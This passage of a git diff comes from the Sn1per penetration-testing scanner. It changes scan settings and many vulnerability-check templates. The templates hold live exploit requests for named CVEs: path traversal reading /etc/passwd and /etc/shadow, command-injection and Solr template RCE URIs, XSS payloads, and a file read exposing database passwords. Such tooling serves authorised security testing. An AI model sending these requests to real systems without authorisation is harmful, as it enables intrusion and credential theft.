rm -f $WORKSPACE_DIR/reports/host-table-report.csv 2> /dev/null
|
||||
LOOT="1"
|
||||
loot
|
||||
exit
|
||||
fi
|
||||
|
|
@ -644,11 +645,15 @@ fi
|
|||
# INITILIZE
|
||||
init
|
||||
|
||||
# CHECK CONNECTION STATUS
|
||||
check_online
|
||||
if [[ ! -f /tmp/update-check.txt ]]; then
|
||||
# CHECK CONNECTION STATUS
|
||||
check_online
|
||||
fi
|
||||
|
||||
# CHECK FOR UPDATES
|
||||
check_update
|
||||
if [[ ! -f /tmp/update-check.txt ]]; then
|
||||
# CHECK FOR UPDATES
|
||||
check_update
|
||||
fi
|
||||
|
||||
# CHECK FOR BLACKARCH LINUX
|
||||
if grep -q BlackArch /etc/issue; then
|
||||
|
|
@ -675,4 +680,6 @@ source modes/airstrike.sh
|
|||
source modes/nuke.sh
|
||||
source modes/normal.sh
|
||||
|
||||
rm -f /tmp/update-check.txt 2> /dev/null
|
||||
|
||||
exit 0
|
||||
|
|
|
|||
37
sniper.conf
37
sniper.conf
|
|
@ -11,13 +11,17 @@ RESET='\e[0m'
|
|||
REGEX='^[0-9]+$'
|
||||
|
||||
# DEFAULT SETTINGS
|
||||
AUTOBRUTE="0"
|
||||
AUTO_BRUTE="0"
|
||||
AUTO_VULNSCAN="0"
|
||||
FULLNMAPSCAN="0"
|
||||
OSINT="0"
|
||||
ENABLE_AUTO_UPDATES="1"
|
||||
REPORT="1"
|
||||
LOOT="1"
|
||||
|
||||
# OUT OF SCOPE
|
||||
OUT_OF_SCOPE=("www.xerosecurity.com" "xerosecurity.com" "*.xerosecurity.com")
|
||||
|
||||
# SN1PER PROFESSIONAL SETTINGS
|
||||
SNIPER_PRO_CONSOLE_OUTPUT="0"
|
||||
SN1PER_AUTOLOAD="0"
|
||||
|
|
@ -31,7 +35,7 @@ BURP_HOST="127.0.0.1"
|
|||
BURP_PORT="1338"
|
||||
|
||||
# OPENVAS CONFIG
|
||||
OPENVAS="1"
|
||||
OPENVAS="0"
|
||||
OPENVAS_HOST="127.0.0.1"
|
||||
OPENVAS_PORT="9390"
|
||||
OPENVAS_USERNAME="admin"
|
||||
|
|
@ -156,7 +160,6 @@ SHOW_MOUNT="1"
|
|||
RPC_INFO="1"
|
||||
SMB_ENUM="1"
|
||||
AMAP="0"
|
||||
YASUO="0"
|
||||
|
||||
# OSINT PLUGINS
|
||||
WHOIS="1"
|
||||
|
|
@ -174,11 +177,13 @@ H8MAIL="0"
|
|||
GITHUB_SECRETS="0"
|
||||
URLSCANIO="1"
|
||||
|
||||
# DYNAMIC APPLICATION SCANNERS
|
||||
BURP_SCAN="0"
|
||||
ARACHNI_SCAN="0"
|
||||
ZAP_SCAN="0"
|
||||
|
||||
# ACTIVE WEB PLUGINS
|
||||
SC0PE_VULNERABLITY_SCANNER="1"
|
||||
BURP_SCAN="0"
|
||||
ARACHNI_SCAN="1"
|
||||
ZAP_SCAN="0"
|
||||
DIRSEARCH="1"
|
||||
GOBUSTER="0"
|
||||
NIKTO="0"
|
||||
|
|
@ -194,7 +199,7 @@ SHOCKER="0"
|
|||
JEXBOSS="0"
|
||||
WEBTECH="1"
|
||||
SSL_INSECURE="1"
|
||||
HTTP_PROBE="1"
|
||||
HTTP_PROBE="0"
|
||||
SMUGGLER="1"
|
||||
|
||||
# PASSIVE WEB PLUGINS
|
||||
|
|
@ -211,13 +216,14 @@ SPOOF_CHECK="1"
|
|||
|
||||
# RECON PLUGINS
|
||||
SUBHIJACK_CHECK="0"
|
||||
SLURP="1"
|
||||
SUBLIST3R="1"
|
||||
AMASS="1"
|
||||
SUBFINDER="1"
|
||||
DNSCAN="1"
|
||||
AQUATONE="0"
|
||||
SLURP="0"
|
||||
SUBLIST3R="0"
|
||||
AMASS="0"
|
||||
SUBFINDER="0"
|
||||
DNSCAN="0"
|
||||
CRTSH="1"
|
||||
SUBOVER="1"
|
||||
SUBOVER="0"
|
||||
PROJECT_SONAR="1"
|
||||
CENSYS_SUBDOMAINS="0"
|
||||
SUBNET_RETRIEVAL="1"
|
||||
|
|
@ -227,7 +233,8 @@ MASS_DNS="0"
|
|||
DNSGEN="0"
|
||||
SHODAN="0"
|
||||
ASN_CHECK="1"
|
||||
SPYSE="1"
|
||||
SPYSE="0"
|
||||
SUBBRUTE_DNS="0"
|
||||
GITHUB_SUBDOMAINS="0"
|
||||
RAPIDDNS="1"
|
||||
SCAN_ALL_DISCOVERED_DOMAINS="1"
|
||||
SCAN_ALL_DISCOVERED_DOMAINS="0"
|
||||
|
|
@ -2,7 +2,7 @@ AUTHOR='@xer0dayz'
|
|||
VULN_NAME='CVE-2019-11510 - Pulse Connect Secure SSL VPN Arbitrary File Read'
|
||||
URI='/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'
|
||||
METHOD='GET'
|
||||
MATCH='root\:'
|
||||
MATCH="root:*:"
|
||||
SEVERITY='P1 - CRITICAL'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
|
|
|
|||
|
|
@ -2,7 +2,7 @@ AUTHOR='@xer0dayz'
|
|||
VULN_NAME='CVE-2019-11580 - Atlassian Crowd Data Center Unauthenticated RCE'
|
||||
URI='/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow'
|
||||
METHOD='GET'
|
||||
MATCH='root\:'
|
||||
MATCH="root:*:"
|
||||
SEVERITY='P1 - CRITICAL'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
|
|
|
|||
|
|
@ -2,7 +2,7 @@ AUTHOR='@xer0dayz'
|
|||
VULN_NAME='CVE-2019-16662 - rConfig 3.9.2 Remote Code Execution'
|
||||
URI='/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23'
|
||||
METHOD='GET'
|
||||
MATCH='root\:'
|
||||
MATCH="root:*:"
|
||||
SEVERITY='P1 - CRITICAL'
|
||||
CURL_OPTS='--user-agent "" -s -L --insecure'
|
||||
SECONDARY_COMMANDS=''
|
||||
|
|
|
|||
|
|
@ -2,7 +2,7 @@ AUTHOR='@xer0dayz'
|
|||
VULN_NAME='CVE-2019-17558 - Apache Solr RCE'
|
||||
URI='/solr/dovecot/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27cat%20/etc/passwd%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'
|
||||
METHOD='GET'
|
||||
MATCH='root\:'
|
||||
MATCH="root:*:"
|
||||
SEVERITY='P1 - CRITICAL'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
|
|
|
|||
|
|
@ -2,7 +2,7 @@ AUTHOR='@xer0dayz'
|
|||
VULN_NAME='CVE-2019-5418 - File Content Disclosure on Rails'
|
||||
URI="/../../../../../../../../etc/passwd\{\{"
|
||||
METHOD='GET'
|
||||
MATCH="root\:"
|
||||
MATCH="root:*:"
|
||||
SEVERITY='P2 - HIGH'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
|
|
|
|||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2019-6340 - Drupal8 REST RCE SA-CORE-2019-003'
|
||||
URI='/node/1?_format=hal_json'
|
||||
METHOD='GET'
|
||||
MATCH='INVALID_VALUE\ does\ not\ correspond'
|
||||
SEVERITY='P1 - CRITICAL'
|
||||
CURL_OPTS='--user-agent "" -s -L --insecure -H "Content-Type: application/hal+json" --data \'{ "_links": { "type": { "href": "http://192.168.56.101/drupal-8.6.9/rest/type/node/INVALID_VALUE" } }, "type": { "target_id": "article" }, "title": { "value": "My Article" }, "body": { "value": "some body content aaa bbb ccc" }}\' '
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -2,7 +2,7 @@ AUTHOR='@xer0dayz'
|
|||
VULN_NAME='CVE-2019-7192 - QNAP Pre-Auth Root RCE'
|
||||
URI='/photo/p/api/video.php'
|
||||
METHOD='GET'
|
||||
MATCH='401\ Unauthorized'
|
||||
MATCH="\[\ 401\ Unauthorized\ \]"
|
||||
SEVERITY='P1 - CRITICAL'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
|
|
|
|||
|
|
@ -2,7 +2,7 @@ AUTHOR='@xer0dayz'
|
|||
VULN_NAME='CVE-2019-8982 - Wavemaker Studio 6.6 LFI/SSRF'
|
||||
URI="/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd"
|
||||
METHOD='GET'
|
||||
MATCH="root\:"
|
||||
MATCH="root:*:"
|
||||
SEVERITY='P2 - HIGH'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
|
|
|
|||
|
|
@ -1,6 +1,6 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2020-14181 - User Enumeration Via Insecure Jira Endpoint'
|
||||
URI="/secure/ViewUserHover.jspa"
|
||||
URI="/secure/ViewUserHover.jspa?username=randomUser"
|
||||
METHOD='GET'
|
||||
MATCH="User\ does\ not\ exist"
|
||||
SEVERITY='P3 - MEDIUM'
|
||||
|
|
|
|||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2020-14815 - Oracle Business Intelligence Enterprise DOM XSS'
|
||||
URI='/bi-security-login/login.jsp?msi=false&redirect="><img/src/onerror%3dalert(document.domain)>'
|
||||
METHOD='GET'
|
||||
MATCH="Oracle\ Business\ Intelligence"
|
||||
SEVERITY='P2 - HIGH'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -1,8 +1,8 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2020-2096 Jenkins Gitlab XSS 1'
|
||||
URI="/git/build_now/a'\"><INJECTX>"
|
||||
URI="/git/build_now/a'\">%3Csvg/onload=alert(1337)%3E"
|
||||
METHOD='GET'
|
||||
MATCH="<INJECTX>"
|
||||
MATCH="<svg/onload=alert\(1337\)>"
|
||||
SEVERITY='P3 - MEDIUM'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
|
|
|
|||
|
|
@ -1,8 +1,8 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2020-2096 Jenkins Gitlab XSS 2'
|
||||
URI="/jenkins/git/build_now/a'\"><INJECTX>"
|
||||
URI="/jenkins/git/build_now/a'\">%3Csvg/onload=alert(1337)%3E"
|
||||
METHOD='GET'
|
||||
MATCH="<INJECTX>"
|
||||
MATCH="<svg/onload=alert\(1337\)>"
|
||||
SEVERITY='P3 - MEDIUM'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
|
|
|
|||
|
|
@ -1,8 +1,8 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2020-2096 Jenkins Gitlab XSS 3'
|
||||
URI="/gitlab/build_now/a'\"><INJECTX>"
|
||||
URI="/gitlab/build_now/a'\">%3Csvg/onload=alert(1337)%3E"
|
||||
METHOD='GET'
|
||||
MATCH="<INJECTX>"
|
||||
MATCH="<svg/onload=alert\(1337\)>"
|
||||
SEVERITY='P3 - MEDIUM'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
|
|
|
|||
|
|
@ -1,8 +1,8 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2020-2096 Jenkins Gitlab XSS 4'
|
||||
URI="/jenkins/gitlab/build_now/a'\"><INJECTX>"
|
||||
URI="/jenkins/gitlab/build_now/a'\">%3Csvg/onload=alert(1337)%3E"
|
||||
METHOD='GET'
|
||||
MATCH="<INJECTX>"
|
||||
MATCH="<svg/onload=alert\(1337\)>"
|
||||
SEVERITY='P3 - MEDIUM'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
|
|
|
|||
|
|
@ -1,8 +1,8 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2020-2140 - Jenkin AuditTrailPlugin XSS'
|
||||
URI="/descriptorByName/AuditTrailPlugin/regexCheck?value=*j<INJECTX>"
|
||||
URI="/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Csvg/onload=alert(1337)%3E"
|
||||
METHOD='GET'
|
||||
MATCH="<INJECTX>"
|
||||
MATCH="<svg/onload=alert\(1337\)>"
|
||||
SEVERITY='P3 - MEDIUM'
|
||||
CURL_OPTS="--user-agent '' -s --insecure -L "
|
||||
SECONDARY_COMMANDS=''
|
||||
|
|
|
|||
|
|
@ -1,8 +1,8 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2020-24223 - Mara CMS 7.5 Reflective XSS'
|
||||
URI='/contact.php?theme=<INJECTX>'
|
||||
URI='/contact.php?theme=%3Csvg/onload=alert(1337)%3E'
|
||||
METHOD='GET'
|
||||
MATCH='<INJECTX>'
|
||||
MATCH="<svg/onload=alert\(1337\)>"
|
||||
SEVERITY='P3 - MEDIUM'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
|
|
|
|||
|
|
@ -2,7 +2,7 @@ AUTHOR='@xer0dayz'
|
|||
VULN_NAME='CVE-2020-2551 - Unauthenticated Oracle WebLogic Server Remote Code Execution'
|
||||
URI='/console/login/LoginForm.jsp'
|
||||
METHOD='GET'
|
||||
MATCH='10.3.6.0|12.1.3.0|12.2.1.3|12.2.1.4'
|
||||
MATCH="10\.3\.6\.0|12\.1\.3\.0|12\.2\.1\.3|12\.2\.1\.4"
|
||||
SEVERITY='P1 - CRITICAL'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
|
|
|
|||
|
|
@ -2,7 +2,7 @@ AUTHOR='@xer0dayz'
|
|||
VULN_NAME='CVE-2020-5405 - Spring Directory Traversal 1'
|
||||
URI="/a/a/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f../etc/passwd"
|
||||
METHOD='GET'
|
||||
MATCH="root\:|nameserver|\[extensions\]"
|
||||
MATCH="root:*:|nameserver|\[extensions\]"
|
||||
SEVERITY='P1 - CRITICAL'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
|
|
|
|||
|
|
@ -2,7 +2,7 @@ AUTHOR='@xer0dayz'
|
|||
VULN_NAME='CVE-2020-5405 - Spring Directory Traversal 2'
|
||||
URI="/a/a/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f../etc/resolv.conf"
|
||||
METHOD='GET'
|
||||
MATCH="root\:|nameserver|\[extensions\]"
|
||||
MATCH="root:*:|nameserver|\[extensions\]"
|
||||
SEVERITY='P1 - CRITICAL'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
|
|
|
|||
|
|
@ -2,7 +2,7 @@ AUTHOR='@xer0dayz'
|
|||
VULN_NAME='CVE-2020-5405 - Spring Directory Traversal 2'
|
||||
URI="/a/a/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f../Windows/win.ini"
|
||||
METHOD='GET'
|
||||
MATCH="root\:|nameserver|\[extensions\]"
|
||||
MATCH="root:*:|nameserver|\[extensions\]"
|
||||
SEVERITY='P1 - CRITICAL'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
|
|
|
|||
|
|
@ -2,7 +2,7 @@ AUTHOR='@xer0dayz'
|
|||
VULN_NAME='CVE-2020-5902 - F5 BIG-IP Remote Code Execution 2'
|
||||
URI='/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
|
||||
METHOD='GET'
|
||||
MATCH="root\:"
|
||||
MATCH="root:*:"
|
||||
SEVERITY='P1 - CRITICAL'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
|
|
|
|||
|
|
@ -1,8 +1,8 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2020-5902 - F5 BIG-IP XSS'
|
||||
URI='/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=<INJECTX>'
|
||||
URI='/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=%3Csvg/onload=alert(1337)%3E'
|
||||
METHOD='GET'
|
||||
MATCH='<INJECTX>'
|
||||
MATCH="<svg/onload=alert\(1337\)>"
|
||||
SEVERITY='P1 - CRITICAL'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
|
|
|
|||
|
|
@ -2,7 +2,7 @@ AUTHOR='@xer0dayz'
|
|||
VULN_NAME='CVE-2020-8115 - Revive Adserver XSS'
|
||||
URI="/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\""
|
||||
METHOD='GET'
|
||||
MATCH='alert\(1337\)'
|
||||
MATCH="\);alert\(1\);setTimeout\('alert\(\"&loc='"
|
||||
SEVERITY='P2 - HIGH'
|
||||
CURL_OPTS="--user-agent '' -s --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
|
|
|
|||
|
|
@ -2,8 +2,8 @@ AUTHOR='@xer0dayz'
|
|||
VULN_NAME='CVE-2020-8191 - Citrix ADC & NetScaler Gateway Reflected XSS'
|
||||
URI="/menu/stapp"
|
||||
METHOD='POST'
|
||||
MATCH="<INJECTX>"
|
||||
MATCH="<svg/onload=alert\(1337\)>"
|
||||
SEVERITY='P1 - HIGH'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: 'X-NITRO-USER: xpyZxwy6' --data 'sid=254&pe=1,2,3,4,5&appname=%0a</title><INJECTX>&au=1&username=nsroot'"
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: 'X-NITRO-USER: xpyZxwy6' --data 'sid=254&pe=1,2,3,4,5&appname=%0a</title><svg/onload=alert(1337)>&au=1&username=nsroot'"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2020-8209 - Citrix XenMobile Server Path Traversal'
|
||||
URI="/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd"
|
||||
METHOD='GET'
|
||||
MATCH="root:*:"
|
||||
SEVERITY='P2 - HIGH'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2020-8209 - XenMobile-Citrix Endpoint Management Config Password Disclosure'
|
||||
URI='/jsp/help-sb-download.jsp?sbFileName=../../../opt/sas/sw/config/sftu.properties'
|
||||
METHOD='GET'
|
||||
MATCH="database\.password"
|
||||
SEVERITY='P1 - CRITICAL'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2020-8209 - XenMobile-Citrix Endpoint Management Path Traversal'
|
||||
URI='/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd'
|
||||
METHOD='GET'
|
||||
MATCH="root:*:"
|
||||
SEVERITY='P2 - HIGH'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -2,7 +2,7 @@ AUTHOR='@xer0dayz'
|
|||
VULN_NAME='CVE-2020-9047 - exacqVision Web Service Remote Code Execution'
|
||||
URI="/version.web"
|
||||
METHOD='GET'
|
||||
MATCH='3.10.4.72058|3.12.4.76544|3.8.2.67295|7.0.2.81005|7.2.7.86974|7.4.3.89785|7.6.4.94391|7.8.2.97826|8.0.6.105408|8.2.2.107285|8.4.3.111614|8.6.3.116175|8.8.1.118913|9.0.3.124620|9.2.0.127940|9.4.3.137684|9.6.7.145949|9.8.4.149166|19.03.3.152166|19.06.4.157118|19.09.4.0|19.12.2.0|20.03.2.0|20.06.3.0'
|
||||
MATCH="3\.10\.4\.72058|3\.12\.4\.76544|3\.8\.2\.67295|7\.0\.2\.81005|7\.2\.7\.86974|7\.4\.3\.89785|7\.6\.4\.94391|7\.8\.2\.97826|8\.0\.6\.105408|8\.2\.2\.107285|8\.4\.3\.111614|8\.6\.3\.116175|8\.8\.1\.118913|9\.0\.3\.124620|9\.2\.0\.127940|9\.4\.3\.137684|9\.6\.7\.145949|9\.8\.4\.149166|19\.03\.3\.152166|19\.06\.4\.157118|19\.09\.4\.0|19\.12\.2\.0|20\.03\.2\.0|20\.06\.3\.0"
|
||||
SEVERITY='P1 - CRITICAL'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
|
|
|
|||
|
|
@ -2,7 +2,7 @@ AUTHOR='@xer0dayz'
|
|||
VULN_NAME='CVE-2020-9484 - Apache Tomcat RCE by deserialization'
|
||||
URI="/index.jsp"
|
||||
METHOD='GET'
|
||||
MATCH="Exception|ObjectInputStream|PersistentManagerBase"
|
||||
MATCH='ObjectInputStream|PersistentManagerBase'
|
||||
SEVERITY='P1 - CRITICAL'
|
||||
CURL_OPTS="--user-agent '' -s --insecure -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy' "
|
||||
SECONDARY_COMMANDS=''
|
||||
|
|
|
|||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Frontpage Service Password Disclosure'
|
||||
URI='/_vti_pvt/service.pwd'
|
||||
METHOD='GET'
|
||||
MATCH=' Frontpage'
|
||||
SEVERITY='P2 - HIGH'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='SolarWinds Orion Default Credentials 1'
|
||||
URI='/SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS'
|
||||
METHOD='GET'
|
||||
MATCH="totalRow|Orion|Poller"
|
||||
SEVERITY='P2 - HIGH'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure -H 'Authorization: Basic YWRtaW46' -H 'Content-Type: application/json' "
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS=''
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='SolarWinds Orion Default Credentials 2'
|
||||
URI=':17778/SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROW'
|
||||
METHOD='GET'
|
||||
MATCH="totalRow|Orion|Poller"
|
||||
SEVERITY='P2 - HIGH'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure -H 'Authorization: Basic YWRtaW46' -H 'Content-Type: application/json' "
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS=''
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='SolarWinds Orion Panel'
|
||||
URI='/Orion/Login.aspx'
|
||||
METHOD='GET'
|
||||
MATCH="SolarWinds\ Orion"
|
||||
SEVERITY='P5 - INFO'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -2,7 +2,7 @@ AUTHOR='@xer0dayz'
|
|||
VULN_NAME='VMware vCenter Unauthenticated Arbitrary File Read'
|
||||
URI='/eam/vib?id=C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx\\vcdb.properties'
|
||||
METHOD='GET'
|
||||
MATCH="driver|dbtype"
|
||||
MATCH="dbtype|password\.ecrypted"
|
||||
SEVERITY='P2 - HIGH'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
|
|
|
|||
|
|
@ -7,5 +7,3 @@ SEVERITY='P5 - INFO'
|
|||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS=''
|
||||
|
||||
curl --connect-timeout 3 --max-time 5 -k -X $METHOD $CURL_OPTS "https://${TARGET}:2083${URI}" 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/match.out && echo "$SEVERITY, $VULN_NAME,https://${TARGET}:2083${URI},$(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-2083-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: https://$TARGET:2083/$URI - EVIDENCE: $(cat /tmp/match.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: https://${TARGET}:2083${URI} - EVIDENCE: $(cat /tmp/match.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='cPanel Login Found 2'
|
||||
URI=':2083/'
|
||||
METHOD='GET'
|
||||
MATCH="cPanel\ Login"
|
||||
SEVERITY='P5 - INFO'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS=''
|
||||
|
|
@ -1,7 +1,7 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Subjack Takeover Detected'
|
||||
FILENAME="$LOOT_DIR/nmap/subjack-$TARGET.txt"
|
||||
MATCH='anima|bitly|wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost\.io|ghost\.org|ghost\.com|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp'
|
||||
MATCH="\[Vulnerable\]"
|
||||
SEVERITY='P2 - HIGH'
|
||||
GREP_OPTIONS='-i'
|
||||
SEARCH='positive'
|
||||
|
|
|
|||
|
|
@ -1,7 +1,7 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Subover Takeover Detected'
|
||||
FILENAME="$LOOT_DIR/nmap/subover-$TARGET.txt"
|
||||
MATCH='netlify|wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|modulus|unbounce|uservoice|wpengine|cloudapp'
|
||||
MATCH="Takeover\ Possible"
|
||||
SEVERITY='P2 - HIGH'
|
||||
GREP_OPTIONS='-i'
|
||||
SEARCH='positive'
|
||||
|
|
|
|||
|
|
@ -9,5 +9,6 @@ OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
|
|||
TYPE='network'
|
||||
|
||||
rm -f /tmp/match.out 2> /dev/null
|
||||
